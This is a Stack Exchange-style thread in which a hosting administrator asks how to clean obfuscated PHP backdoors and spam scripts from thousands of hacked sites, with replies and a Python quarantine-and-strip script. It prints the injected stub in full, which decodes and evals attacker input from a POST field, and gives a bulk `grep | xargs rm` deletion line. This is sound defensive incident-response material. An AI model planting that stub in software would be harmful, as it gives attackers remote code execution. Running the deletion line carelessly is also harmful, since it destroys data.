
I have multiple VPSs with at least thousands of accounts on them.

My clients' websites are hacked and sending spam emails. I checked the log and found two types of scripts.

Type 1:

<?php 
$d79="HYI\riP=s5`bX'a43Z #fn%dTy9c|JWjMV<z0Q]6&kD}UECrue~mq8->N2hpx_!Bo*g\nK\$O1{7G[^.L+Rw\\;?FA)lt\tS@,/\":(v"; $GLOBALS['ujijy64'] = $d79[4].$d7

Type 2:

<?php
function wtakziboyl($gaezs, $fp){$vdxhvfmnol = ''; for($i=0; $i < strlen($gaezs); $i++){$vdxhvfmnol .= isset($fp[$gaezs[$i]]) ? $fp[$gaezs[$i]] : $gaezs[$i];}
$otcow="base64_decode";return $otcow($vdxhvfmnol);}
$sfnb = '4fwFMBxy214Q5XBm8exm1XHK2m83NZsBdZpzvpzUMRsz1jCwgJArtfxr1X'.
'Bm8exm8m83NSUzvpzUMRsz1jCwgJArtRhY1XBY2RCIgfwKtwxkMRIw5mpAbJ'.
'aiJa0y21cqgfwE2Bx3MRIzgJApOd3OJeweOfwy8XBkOJcqnkBPBaBPOPaOopQ55hxdcB'.

After further investigation I found injected scripts at the top of genuine files, like the one below:

$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n828e00'])) {eval($s21(${$s20}['n828e00']));}?>

I suspect the above code is a backdoor. I want to remove all those scripts, or at least stop them from executing. Maybe I can use modsec rules.

By surfing the internet I found that we can run the code below to remove such an injection:

grep -Rl PCT4BA6ODSE . | xargs sed -i 's/<[?]php.*PCT4BA6ODSE_.*[?]>/<\?php \/\/ RECOVERED FILE \?>/g'

Manually finding such files on a server where thousands of accounts are hosted is next to impossible, so I want to do it automatically (in this case).

I know there are many other backdoors, but for this scenario what do you people suggest?

This may not be a good idea and it may affect server performance; I would love to hear any alternative ideas.

Prakash
    You tagged this question with [tag:email] and [tag:spammer], but your question doesn't seem to be related to either. In any case, I would suggest that the presence of a sequence of characters like `PCT4BA6ODSE_` in an uploaded file is the least of your worries. You should be more concerned by the fact that you have — apparently — created a service where unknown individuals can upload executable files and run them on your server. – r3mainer Oct 08 '15 at 12:06
  • 2
    Just guessing, but what you probably want is to disable execution of PHP files inside the upload folder. You can use `php_flag engine off` in an `.htaccess` file in the upload directory for that. To get rid of the backdoor from existing files and get some insight into what it is doing, see [WordPress Remote Code Execution](http://somewebgeek.com/2014/wordpress-remote-code-execution-base64_decode/) – bretik Oct 08 '15 at 13:17
  • Possible duplicate of [How do I deal with a compromised server?](http://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) – Deer Hunter Oct 08 '15 at 13:38
  • "hacked accounts with php files" - I think that statement needs some explanation before we can answer your question. Define 'accounts'. OS accounts? Web accounts? – schroeder Oct 08 '15 at 14:41
  • In addition to @bretik's comment, look at using "Options -Indexes -ExecCGI" in your .htaccess file, if your hoster permits you to do this. – Scott C Wilson Oct 08 '15 at 15:33

1 Answer

Answering your question (but not solving your problem):

Run this every hour or so:

grep -l PCT4BA6ODSE_ * | xargs rm

This will delete every php file with that string in it. But that string is only the symptom, not the problem. The problem is that you have a security compromise, and no matter how you clean your system, it will be reinfected.

To really solve your problem, you must audit all the components of the system. The easiest way is to reinstall everything from scratch, update every component, harden its settings, search every php file for backdoors, then put the system online again.

ThoriumBR
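An added example (not code from the question or the answer) of the automated clean-up both posts describe, done more carefully than `grep | xargs rm`: it finds PHP files carrying the `PCT4BA6ODSE_` stub shown in the question, strips only that `<?php ... ?>` block, and moves each original into a quarantine directory instead of deleting the whole file. The directory names, `clean_tree`/`demo` helpers and sample files are constructed for the demo.

```python
import os
import re
import shutil
import tempfile

MARKER = "PCT4BA6ODSE_"
# The stub's own <?php ... ?> block only; the question's greedy sed `.*` can eat more.
STUB_RE = re.compile(r"<\?php(?:(?!<\?php).)*?" + re.escape(MARKER)
                     + r"(?:(?!<\?php).)*?\?>", re.DOTALL)

def strip_injected_stub(source: str) -> tuple[str, bool]:
    """Return (cleaned_source, changed); only the block carrying MARKER is cut."""
    cleaned, count = STUB_RE.subn("", source, count=1)
    return cleaned, count > 0

def clean_tree(root: str, quarantine: str) -> list[str]:
    """Strip the stub from .php files under root; originals move to quarantine."""
    changed = []
    for dirpath, _, names in os.walk(root):
        for name in (n for n in names if n.endswith(".php")):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                source = fh.read()
            if MARKER not in source:  # cheap pre-filter, same idea as grep -l
                continue
            cleaned, did_change = strip_injected_stub(source)
            if not did_change:
                continue
            backup = os.path.join(quarantine, os.path.relpath(path, root))
            os.makedirs(os.path.dirname(backup), exist_ok=True)
            shutil.move(path, backup)  # keep the original for review or restore
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(cleaned)
            changed.append(path)
    return changed

# Constructed sample: the question's stub prepended to a genuine file.
STUB = '<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5]);?>'
GENUINE = "<?php\necho 'hello';\n"

def demo() -> tuple[int, str]:  # returns (files changed, cleaned index.php text)
    with tempfile.TemporaryDirectory() as tmp:
        site = os.path.join(tmp, "public_html")
        os.makedirs(site)
        for name, body in (("index.php", STUB + GENUINE), ("ok.php", GENUINE)):
            with open(os.path.join(site, name), "w") as fh:
                fh.write(body)
        changed = clean_tree(site, os.path.join(tmp, "quarantine"))
        with open(os.path.join(site, "index.php")) as fh:
            return len(changed), fh.read()
```

Point `clean_tree` at a document root and a quarantine path outside it, since `os.walk` would otherwise descend into the quarantined copies.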